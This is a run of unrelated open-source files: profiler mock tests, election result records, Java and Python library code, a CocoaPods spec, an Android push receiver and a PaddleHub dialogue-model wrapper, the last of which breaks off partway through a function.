EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo3(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo3(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP2(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *pFunctionId,
/* [out] */ ReJITID *pReJitId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP2(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP2(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetReJITIDs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetReJITIDs(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ULONG cReJitIds,
/* [out] */ ULONG *pcReJitIds,
/* [length_is][size_is][out] */ ReJITID reJitIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetReJITIDs(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetReJITIDs(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILToNativeMapping2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILToNativeMapping2(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ReJITID reJitId,
/* [in] */ ULONG32 cMap,
/* [out] */ ULONG32 *pcMap,
/* [length_is][size_is][out] */ COR_DEBUG_IL_TO_NATIVE_MAP map[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILToNativeMapping2(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILToNativeMapping2(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumJITedFunctions2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumJITedFunctions2(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerFunctionEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumJITedFunctions2(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumJITedFunctions2(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectSize2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectSize2(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ SIZE_T *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectSize2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectSize2(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetEventMask2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetEventMask2(_, _))
.WillByDefault(Invoke([this](/* [out] */ DWORD *pdwEventsLow,
/* [out] */ DWORD *pdwEventsHigh) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetEventMask2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetEventMask2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEventMask2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEventMask2(_, _))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwEventsLow,
/* [in] */ DWORD dwEventsHigh) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEventMask2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEventMask2(0, 0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumNgenModuleMethodsInliningThisMethod_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumNgenModuleMethodsInliningThisMethod(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID inlinersModuleId,
/* [in] */ ModuleID inlineeModuleId,
/* [in] */ mdMethodDef inlineeMethodId,
/* [out] */ BOOL *incompleteData,
/* [out] */ ICorProfilerMethodEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumNgenModuleMethodsInliningThisMethod(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumNgenModuleMethodsInliningThisMethod(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ApplyMetaData_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ApplyMetaData(_))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ApplyMetaData(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ApplyMetaData(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInMemorySymbolsLength_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInMemorySymbolsLength(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ DWORD *pCountSymbolBytes) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInMemorySymbolsLength(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInMemorySymbolsLength(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ReadInMemorySymbols_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ReadInMemorySymbols(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ DWORD symbolsReadOffset,
/* [out] */ BYTE *pSymbolBytes,
/* [in] */ DWORD countSymbolBytes,
/* [out] */ DWORD *pCountSymbolBytesRead) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ReadInMemorySymbols(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ReadInMemorySymbols(0, 0, nullptr, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_IsFunctionDynamic_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, IsFunctionDynamic(_, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ BOOL *isDynamic) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, IsFunctionDynamic(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->IsFunctionDynamic(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP3(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *functionId,
/* [out] */ ReJITID *pReJitId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP3(_, _, 0)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP3(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetDynamicFunctionInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetDynamicFunctionInfo(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ ModuleID *moduleId,
/* [out] */ PCCOR_SIGNATURE *ppvSig,
/* [out] */ ULONG *pbSig,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [out] */ WCHAR wszName[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetDynamicFunctionInfo(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetDynamicFunctionInfo(0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
| 19,367 |
348 |
{"nom":"Champeau-en-Morvan","circ":"4ème circonscription","dpt":"Côte-d'Or","inscrits":239,"abs":114,"votants":125,"blancs":10,"nuls":7,"exp":108,"res":[{"nuance":"REM","nom":"<NAME>","voix":55},{"nuance":"LR","nom":"M. <NAME>","voix":53}]}
| 101 |
634 |
<reponame>vttranlina/james-project
/****************************************************************
* Licensed to the Apache Software Foundation (ASF) under one *
* or more contributor license agreements. See the NOTICE file *
* distributed with this work for additional information *
* regarding copyright ownership. The ASF licenses this file *
* to you under the Apache License, Version 2.0 (the *
* "License"); you may not use this file except in compliance *
* with the License. You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, *
* software distributed under the License is distributed on an *
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY *
* KIND, either express or implied. See the License for the *
* specific language governing permissions and limitations *
* under the License. *
****************************************************************/
package org.apache.james.filesystem.api;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
public class FileSystemFixture {
public static final FileSystem THROWING_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
throw new UnsupportedOperationException();
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
throw new FileNotFoundException();
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
public static final FileSystem CLASSPATH_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
return ClassLoader.getSystemResourceAsStream(url);
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
return new File(ClassLoader.getSystemResource("recursive/extensions-jars").getFile());
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
public static final FileSystem RECURSIVE_CLASSPATH_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
throw new UnsupportedOperationException();
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
return new File(ClassLoader.getSystemResource("recursive/").getFile());
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
}
| 1,176 |
22,040 |
import re
from ..punctuation import ALPHA_LOWER, ALPHA
from ...symbols import ORTH, NORM
_exc = {}
_abbr_period_exc = [
{ORTH: "A.B.D.", NORM: "Amerika"},
{ORTH: "Alb.", NORM: "albay"},
{ORTH: "Ank.", NORM: "Ankara"},
{ORTH: "Ar.Gör."},
{ORTH: "Arş.Gör."},
{ORTH: "Asb.", NORM: "astsubay"},
{ORTH: "Astsb.", NORM: "astsubay"},
{ORTH: "As.İz."},
{ORTH: "as.iz."},
{ORTH: "Atğm", NORM: "asteğmen"},
{ORTH: "Av.", NORM: "avukat"},
{ORTH: "Apt.", NORM: "apartmanı"},
{ORTH: "apt.", NORM: "apartmanı"},
{ORTH: "Bçvş.", NORM: "başçavuş"},
{ORTH: "bçvş.", NORM: "başçavuş"},
{ORTH: "bk.", NORM: "bakınız"},
{ORTH: "bknz.", NORM: "bakınız"},
{ORTH: "Bnb.", NORM: "binbaşı"},
{ORTH: "bnb.", NORM: "binbaşı"},
{ORTH: "Böl.", NORM: "bölümü"},
{ORTH: "böl.", NORM: "bölümü"},
{ORTH: "Bşk.", NORM: "başkanlığı"},
{ORTH: "bşk.", NORM: "başkanlığı"},
{ORTH: "Bştbp.", NORM: "baştabip"},
{ORTH: "bştbp.", NORM: "baştabip"},
{ORTH: "Bul.", NORM: "bulvarı"},
{ORTH: "bul.", NORM: "bulvarı"},
{ORTH: "Cad.", NORM: "caddesi"},
{ORTH: "cad.", NORM: "caddesi"},
{ORTH: "çev.", NORM: "çeviren"},
{ORTH: "Çvş.", NORM: "çavuş"},
{ORTH: "çvş.", NORM: "çavuş"},
{ORTH: "dak.", NORM: "dakika"},
{ORTH: "dk.", NORM: "dakika"},
{ORTH: "Doç.", NORM: "doçent"},
{ORTH: "doğ."},
{ORTH: "Dr.", NORM: "doktor"},
{ORTH: "dr.", NORM: "doktor"},
{ORTH: "drl.", NORM: "derleyen"},
{ORTH: "Dz.", NORM: "deniz"},
{ORTH: "Dz.K.K.lığı"},
{ORTH: "Dz.Kuv."},
{ORTH: "Dz.Kuv.K."},
{ORTH: "dzl.", NORM: "düzenleyen"},
{ORTH: "Ecz.", NORM: "eczanesi"},
{ORTH: "ecz.", NORM: "eczanesi"},
{ORTH: "ekon.", NORM: "ekonomi"},
{ORTH: "Fak.", NORM: "fakültesi"},
{ORTH: "Gn.", NORM: "genel"},
{ORTH: "Gnkur.", NORM: "Genelkurmay"},
{ORTH: "Gn.Kur.", NORM: "Genelkurmay"},
{ORTH: "gr.", NORM: "gram"},
{ORTH: "Hst.", NORM: "hastanesi"},
{ORTH: "hst.", NORM: "hastanesi"},
{ORTH: "Hs.Uzm."},
{ORTH: "huk.", NORM: "hukuk"},
{ORTH: "Hv.", NORM: "hava"},
{ORTH: "Hv.K.K.lığı"},
{ORTH: "Hv.Kuv."},
{ORTH: "Hv.Kuv.K."},
{ORTH: "Hz.", NORM: "hazreti"},
{ORTH: "Hz.Öz."},
{ORTH: "İng.", NORM: "ingilizce"},
{ORTH: "İst.", NORM: "İstanbul"},
{ORTH: "Jeol.", NORM: "jeoloji"},
{ORTH: "jeol.", NORM: "jeoloji"},
{ORTH: "Korg.", NORM: "korgeneral"},
{ORTH: "Kur.", NORM: "kurmay"},
{ORTH: "Kur.Bşk."},
{ORTH: "Kuv.", NORM: "kuvvetleri"},
{ORTH: "Ltd.", NORM: "limited"},
{ORTH: "ltd.", NORM: "limited"},
{ORTH: "Mah.", NORM: "mahallesi"},
{ORTH: "mah.", NORM: "mahallesi"},
{ORTH: "max.", NORM: "maksimum"},
{ORTH: "min.", NORM: "minimum"},
{ORTH: "Müh.", NORM: "mühendisliği"},
{ORTH: "müh.", NORM: "mühendisliği"},
{ORTH: "M.Ö."},
{ORTH: "M.S."},
{ORTH: "Onb.", NORM: "onbaşı"},
{ORTH: "Ord.", NORM: "ordinaryüs"},
{ORTH: "Org.", NORM: "orgeneral"},
{ORTH: "Ped.", NORM: "pedagoji"},
{ORTH: "Prof.", NORM: "profesör"},
{ORTH: "prof.", NORM: "profesör"},
{ORTH: "Sb.", NORM: "subay"},
{ORTH: "Sn.", NORM: "sayın"},
{ORTH: "sn.", NORM: "saniye"},
{ORTH: "Sok.", NORM: "sokak"},
{ORTH: "sok.", NORM: "sokak"},
{ORTH: "Şb.", NORM: "şube"},
{ORTH: "şb.", NORM: "şube"},
{ORTH: "Şti.", NORM: "şirketi"},
{ORTH: "şti.", NORM: "şirketi"},
{ORTH: "Tbp.", NORM: "tabip"},
{ORTH: "tbp.", NORM: "tabip"},
{ORTH: "T.C."},
{ORTH: "Tel.", NORM: "telefon"},
{ORTH: "tel.", NORM: "telefon"},
{ORTH: "telg.", NORM: "telgraf"},
{ORTH: "Tğm.", NORM: "teğmen"},
{ORTH: "tğm.", NORM: "teğmen"},
{ORTH: "tic.", NORM: "ticaret"},
{ORTH: "Tug.", NORM: "tugay"},
{ORTH: "Tuğg.", NORM: "tuğgeneral"},
{ORTH: "Tümg.", NORM: "tümgeneral"},
{ORTH: "Uzm.", NORM: "uzman"},
{ORTH: "Üçvş.", NORM: "üstçavuş"},
{ORTH: "Üni.", NORM: "üniversitesi"},
{ORTH: "Ütğm.", NORM: "üsteğmen"},
{ORTH: "vb."},
{ORTH: "vs.", NORM: "vesaire"},
{ORTH: "Yard.", NORM: "yardımcı"},
{ORTH: "Yar.", NORM: "yardımcı"},
{ORTH: "Yd.Sb."},
{ORTH: "Yard.Doç."},
{ORTH: "Yar.Doç."},
{ORTH: "Yb.", NORM: "yarbay"},
{ORTH: "Yrd.", NORM: "yardımcı"},
{ORTH: "Yrd.Doç."},
{ORTH: "Y.Müh."},
{ORTH: "Y.Mim."},
{ORTH: "yy.", NORM: "yüzyıl"},
]
for abbr in _abbr_period_exc:
_exc[abbr[ORTH]] = [abbr]
_abbr_exc = [
{ORTH: "AB", NORM: "Avrupa Birliği"},
{ORTH: "ABD", NORM: "Amerika"},
{ORTH: "ABS", NORM: "fren"},
{ORTH: "AOÇ"},
{ORTH: "ASKİ"},
{ORTH: "Bağ-kur", NORM: "Bağkur"},
{ORTH: "BDDK"},
{ORTH: "BJK", NORM: "Beşiktaş"},
{ORTH: "ESA", NORM: "Avrupa uzay ajansı"},
{ORTH: "FB", NORM: "Fenerbahçe"},
{ORTH: "GATA"},
{ORTH: "GS", NORM: "Galatasaray"},
{ORTH: "İSKİ"},
{ORTH: "KBB"},
{ORTH: "RTÜK", NORM: "radyo ve televizyon üst kurulu"},
{ORTH: "TBMM"},
{ORTH: "TC"},
{ORTH: "TÜİK", NORM: "Türkiye istatistik kurumu"},
{ORTH: "YÖK"},
]
for abbr in _abbr_exc:
_exc[abbr[ORTH]] = [abbr]
_num = r"[+-]?\d+([,.]\d+)*"
_ord_num = r"(\d+\.)"
_date = r"(((\d{1,2}[./-]){2})?(\d{4})|(\d{1,2}[./]\d{1,2}(\.)?))"
_dash_num = r"(([{al}\d]+/\d+)|(\d+/[{al}]))".format(al=ALPHA)
_roman_num = "M{0,3}(?:C[MD]|D?C{0,3})(?:X[CL]|L?X{0,3})(?:I[XV]|V?I{0,3})"
_roman_ord = r"({rn})\.".format(rn=_roman_num)
_time_exp = r"\d+(:\d+)*"
_inflections = r"'[{al}]+".format(al=ALPHA_LOWER)
_abbrev_inflected = r"[{a}]+\.'[{al}]+".format(a=ALPHA, al=ALPHA_LOWER)
_nums = r"(({d})|({dn})|({te})|({on})|({n})|({ro})|({rn}))({inf})?".format(
d=_date,
dn=_dash_num,
te=_time_exp,
on=_ord_num,
n=_num,
ro=_roman_ord,
rn=_roman_num,
inf=_inflections,
)
TOKENIZER_EXCEPTIONS = _exc
TOKEN_MATCH = re.compile(
r"^({abbr})|({n})$".format(n=_nums, abbr=_abbrev_inflected)
).match
| 3,423 |
3,442 |
<filename>src/net/java/sip/communicator/plugin/desktoputil/ScreenInformation.java
/*
* Jitsi, the OpenSource Java VoIP and Instant Messaging client.
*
* Copyright @ 2015 Atlassian Pty Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package net.java.sip.communicator.plugin.desktoputil;
import java.awt.*;
/**
* A class which reads the screen bounds and provides this information.
*
* @author <NAME>
*/
public class ScreenInformation
{
/**
* Calculates the bounding box of all available screens. This method is
* highly inaccurate when screens of different sizes are used or not evenly
* aligned. A correct implementation should generate a polygon.
*
* @return A polygon of the usable screen area.
*/
public static Rectangle getScreenBounds()
{
final GraphicsEnvironment ge = GraphicsEnvironment
.getLocalGraphicsEnvironment();
Rectangle bounds = new Rectangle();
for(GraphicsDevice gd : ge.getScreenDevices())
{
GraphicsConfiguration gc = gd.getDefaultConfiguration();
bounds = bounds.union(gc.getBounds());
}
return bounds;
}
/**
* Checks whether the top edge of the rectangle is contained in any of the
* available screens.
*
* @param window The bounding box of the window.
* @return True when the top edge is in a visible screen area; false
* otherwise
*/
public static boolean isTitleOnScreen(Rectangle window)
{
final GraphicsEnvironment ge = GraphicsEnvironment
.getLocalGraphicsEnvironment();
boolean leftInside = false;
boolean rightInside = false;
Point topLeft = new Point(window.x, window.y);
Point topRight = new Point(window.x + window.width, window.y);
for(GraphicsDevice gd : ge.getScreenDevices())
{
GraphicsConfiguration gc = gd.getDefaultConfiguration();
if(gc.getBounds().contains(topLeft))
leftInside = true;
if(gc.getBounds().contains(topRight))
rightInside = true;
if(leftInside && rightInside)
return true;
}
return leftInside && rightInside;
}
}
| 976 |
986 |
import ibis.expr.operations as ops
import ibis.expr.rules as rlz
import ibis.expr.types as ir
class TypedCaseBuilder:
__slots__ = ()
def type(self):
return rlz.highest_precedence_dtype(self.results)
def else_(self, result_expr):
"""
Specify
Returns
-------
builder : CaseBuilder
"""
kwargs = {
slot: getattr(self, slot)
for slot in self.__slots__
if slot != 'default'
}
result_expr = rlz.any(result_expr)
kwargs['default'] = result_expr
# Maintain immutability
return type(self)(**kwargs)
def end(self):
default = self.default
if default is None:
default = ir.null().cast(self.type())
args = [
getattr(self, slot) for slot in self.__slots__ if slot != 'default'
]
args.append(default)
op = self.__class__.case_op(*args)
return op.to_expr()
class SimpleCaseBuilder(TypedCaseBuilder):
__slots__ = 'base', 'cases', 'results', 'default'
case_op = ops.SimpleCase
def __init__(self, base, cases=None, results=None, default=None):
self.base = base
self.cases = list(cases if cases is not None else [])
self.results = list(results if results is not None else [])
self.default = default
def when(self, case_expr, result_expr):
"""
Add a new case-result pair.
Parameters
----------
case : Expr
Expression to equality-compare with base expression. Must be
comparable with the base.
result : Expr
Value when the case predicate evaluates to true.
Returns
-------
builder : CaseBuilder
"""
case_expr = rlz.any(case_expr)
result_expr = rlz.any(result_expr)
if not rlz.comparable(self.base, case_expr):
raise TypeError(
'Base expression and passed case are not ' 'comparable'
)
cases = list(self.cases)
cases.append(case_expr)
results = list(self.results)
results.append(result_expr)
# Maintain immutability
return type(self)(self.base, cases, results, self.default)
class SearchedCaseBuilder(TypedCaseBuilder):
__slots__ = 'cases', 'results', 'default'
case_op = ops.SearchedCase
def __init__(self, cases=None, results=None, default=None):
self.cases = list(cases if cases is not None else [])
self.results = list(results if results is not None else [])
self.default = default
def when(self, case_expr, result_expr):
"""
Add a new case-result pair.
Parameters
----------
case : Expr
Expression to equality-compare with base expression. Must be
comparable with the base.
result : Expr
Value when the case predicate evaluates to true.
Returns
-------
builder : CaseBuilder
"""
case_expr = rlz.any(case_expr)
result_expr = rlz.any(result_expr)
if not isinstance(case_expr, ir.BooleanValue):
raise TypeError(case_expr)
cases = list(self.cases)
cases.append(case_expr)
results = list(self.results)
results.append(result_expr)
# Maintain immutability
return type(self)(cases, results, self.default)
| 1,519 |
5,169 |
{
"name": "Konotor",
"version": "3.6.10",
"summary": "Konotor - iOS SDK - Rich 2 way messaging inbox for apps",
"description": " Konotor enables businesses and app owners to engage, retain and sell more to their mobile app users by powering a rich 2-way messaging inbox for apps.\n\n * enables a whatsapp/imessage like experience inside the app\n * provides a set of tools to help you engage users in a personalized and contextual manner (www.konotor.com)\n * can be used for marketing, life cycle messaging, feedback, pro-active support, and more\n * has APIs, integrations and allows for customization\n",
"homepage": "http://www.konotor.com",
"license": "MIT",
"authors": {
"<NAME>": "<EMAIL>"
},
"social_media_url": "http://twitter.com/konotor",
"platforms": {
"ios": "5.1"
},
"source": {
"git": "https://github.com/deepak-bala/konotor-ios.git",
"tag": "3.6.10"
},
"source_files": [
"Konotor/*/*.{h,m}",
"Konotor/*/*/*.h"
],
"preserve_paths": [
"Konotor/include/Konotor/*.h",
"Konotor/libKonotorCombined.a",
"Konotor/KonotorModels.bundle"
],
"resources": [
"Konotor/*/*/*.png",
"Konotor/KonotorModels.bundle",
"Konotor/*/*.xib"
],
"ios": {
"vendored_libraries": "Konotor/libKonotorCombined.a"
},
"frameworks": [
"Foundation",
"UIKit",
"AVFoundation",
"CoreGraphics",
"AudioToolbox",
"CoreMedia",
"CoreData",
"ImageIO",
"QuartzCore"
],
"xcconfig": {
"LIBRARY_SEARCH_PATHS": "\"$(PODS_ROOT)/Konotor\""
},
"requires_arc": true
}
| 730 |
348 |
<gh_stars>100-1000
{"nom":"Donnery","circ":"6ème circonscription","dpt":"Loiret","inscrits":2000,"abs":1073,"votants":927,"blancs":68,"nuls":34,"exp":825,"res":[{"nuance":"MDM","nom":"<NAME>","voix":458},{"nuance":"UDI","nom":"Mme <NAME>","voix":367}]}
| 103 |
778 |
<reponame>qiongqiong-wu/XPush
/*
* Copyright (C) 2019 xuexiangjys(<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.xuexiang.xpush.huawei;
import android.content.Context;
import com.huawei.hms.support.api.push.PushReceiver;
import com.xuexiang.xpush.XPush;
import com.xuexiang.xpush.logs.PushLog;
import com.xuexiang.xpush.util.PushUtils;
import java.nio.charset.Charset;
import static com.xuexiang.xpush.core.annotation.CommandType.TYPE_REGISTER;
import static com.xuexiang.xpush.core.annotation.ConnectStatus.CONNECTED;
import static com.xuexiang.xpush.core.annotation.ConnectStatus.DISCONNECT;
import static com.xuexiang.xpush.core.annotation.ResultCode.RESULT_OK;
import static com.xuexiang.xpush.huawei.HuaweiPushClient.HUAWEI_PUSH_PLATFORM_NAME;
/**
* 消息推送接收器
*
* @author xuexiang
* @since 2019-08-23 15:21
*/
public class HuaweiPushReceiver extends PushReceiver {
private static final String TAG = "HuaweiPush-";
@Override
public void onToken(Context context, String token) {
PushLog.d(TAG + "[onToken]:" + token);
PushUtils.savePushToken(HUAWEI_PUSH_PLATFORM_NAME, token);
XPush.transmitCommandResult(context, TYPE_REGISTER, RESULT_OK, token, null, null);
}
@Override
public void onPushState(Context context, boolean pushState) {
PushLog.d(TAG + "[onPushState]:" + pushState);
XPush.transmitConnectStatusChanged(context, pushState ? CONNECTED : DISCONNECT);
}
@Override
public void onPushMsg(Context context, byte[] bytes, String token) {
String msg = new String(bytes, Charset.forName("UTF-8"));
PushLog.d(TAG + "[onPushMsg]:" + msg);
XPush.transmitMessage(context, msg, null, null);
}
}
| 823 |
8,360 |
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import os
import json
import sys
import argparse
import contextlib
from collections import namedtuple
import paddle.fluid as fluid
import paddlehub as hub
from paddlehub.module.module import runnable
from paddlehub.module.nlp_module import DataFormatError
from paddlehub.common.logger import logger
from paddlehub.module.module import moduleinfo, serving
import plato2_en_base.models as plato_models
from plato2_en_base.tasks.dialog_generation import DialogGeneration
from plato2_en_base.utils import check_cuda, Timer
from plato2_en_base.utils.args import parse_args
@moduleinfo(
name="plato2_en_base",
version="1.0.0",
summary=
"A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.",
author="baidu-nlp",
author_email="",
type="nlp/text_generation",
)
class Plato(hub.NLPPredictionModule):
def _initialize(self):
"""
initialize with the necessary elements
"""
if "CUDA_VISIBLE_DEVICES" not in os.environ:
raise RuntimeError("The module only support GPU. Please set the environment variable CUDA_VISIBLE_DEVICES.")
args = self.setup_args()
self.task = DialogGeneration(args)
self.model = plato_models.create_model(args, fluid.CUDAPlace(0))
self.Example = namedtuple("Example", ["src", "data_id"])
self._interactive_mode = False
def setup_args(self):
"""
Setup arguments.
"""
assets_path = os.path.join(self.directory, "assets")
vocab_path = os.path.join(assets_path, "vocab.txt")
init_pretraining_params = os.path.join(assets_path, "24L", "Plato")
spm_model_file = os.path.join(assets_path, "spm.model")
nsp_inference_model_path = os.path.join(assets_path, "24L", "NSP")
config_path = os.path.join(assets_path, "24L.json")
# ArgumentParser.parse_args use argv[1:], it will drop the first one arg, so the first one in sys.argv should be ""
sys.argv = [
"", "--model", "Plato", "--vocab_path",
"%s" % vocab_path, "--do_lower_case", "False", "--init_pretraining_params",
"%s" % init_pretraining_params, "--spm_model_file",
"%s" % spm_model_file, "--nsp_inference_model_path",
"%s" % nsp_inference_model_path, "--ranking_score", "nsp_score", "--do_generation", "True", "--batch_size",
"1", "--config_path",
"%s" % config_path
]
parser = argparse.ArgumentParser()
plato_models.add_cmdline_args(parser)
DialogGeneration.add_cmdline_args(parser)
args = parse_args(parser)
args.load(args.config_path, "Model")
args.run_infer = True # only build infer program
return args
@serving
def generate(self, texts):
"""
Get the robot responses of the input texts.
Args:
texts(list or str): If not in the interactive mode, texts should be a list in which every element is the chat context separated with '\t'.
Otherwise, texts shoule be one sentence. The module can get the context automatically.
Returns:
results(list): the robot responses.
"""
if not texts:
return []
if self._interactive_mode:
if isinstance(texts, str):
self.context.append(texts.strip())
texts = [" [SEP] ".join(self.context[-self.max_turn:])]
else:
raise ValueError("In the interactive mode, the input data should be a string.")
elif not isinstance(texts, list):
raise ValueError("If not in the interactive mode, the input data should be a list.")
bot_responses = []
for i, text in enumerate(texts):
example = self.Example(src=text.replace("\t", " [SEP] "), data_id=i)
record = self.task.reader._convert_example_to_record(example, is_infer=True)
data = self.task.reader._pad_batch_records([record], is_infer=True)
pred = self.task.infer_step(self.model, data)[0] # batch_size is 1
bot_response = pred["response"] # ignore data_id and score
bot_responses.append(bot_response)
if self._interactive_mode:
